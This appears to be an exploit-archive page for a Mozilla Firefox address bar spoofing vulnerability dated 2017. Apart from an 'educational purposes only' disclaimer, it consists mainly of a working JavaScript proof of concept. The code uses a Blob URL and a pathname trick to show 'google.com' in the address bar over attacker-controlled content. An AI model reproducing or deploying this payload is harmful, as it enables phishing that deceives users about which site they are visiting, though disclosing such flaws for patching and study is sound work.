Mozilla firefox address bar spoofing Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2017-04-14 | Type : local | Platform : multiple
This exploit / vulnerability Mozilla firefox address bar spoofing is for educational purposes only and if it is used you will do on your own risk!


[+] Code ...

<script>
location=URL.createObjectURL(new Blob(['<b>Not Google</b><script>if(location.href.indexOf("google")==-1){location.pathname="https://www.google.com/"}else{document.title="Google Search"}<\/script>'], {type: 'text/html'}))
</script>